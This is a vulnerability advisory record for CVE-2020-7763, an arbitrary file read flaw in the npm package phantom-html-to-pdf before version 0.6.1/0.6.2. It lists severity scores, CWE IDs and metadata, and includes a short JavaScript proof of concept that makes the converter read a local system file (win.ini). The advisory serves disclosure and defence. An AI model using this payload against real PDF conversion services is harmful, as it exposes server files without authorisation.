CVE-2020-7763 – phantom-html-to-pdf

Package

Manager: npm
Name: phantom-html-to-pdf
Vulnerable Version: >=0 <0.6.2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00405 pctl0.60195

Details

Arbitrary File Read in phantom-html-to-pdf This affects the package phantom-html-to-pdf before 0.6.1. ### PoC ```js var fs = require('fs') var conversion = require("phantom-html-to-pdf")(); conversion.allowLocalFilesAccess = false conversion({ html: "document.write(window.location='c:/windows/win.ini')" }, function(err, pdf) { var output = fs.createWriteStream('output.pdf') console.log(pdf.logs); console.log(pdf.numberOfPages); pdf.stream.pipe(output); }); ```

Metadata

Created: 2020-11-06T18:06:16Z
Modified: 2023-09-07T22:36:42Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/11/GHSA-6h7f-qwqm-35pp/GHSA-6h7f-qwqm-35pp.json
CWE IDs: ["CWE-200", "CWE-22"]
Alternative ID: GHSA-6h7f-qwqm-35pp
Finding: F063
Auto approve: 1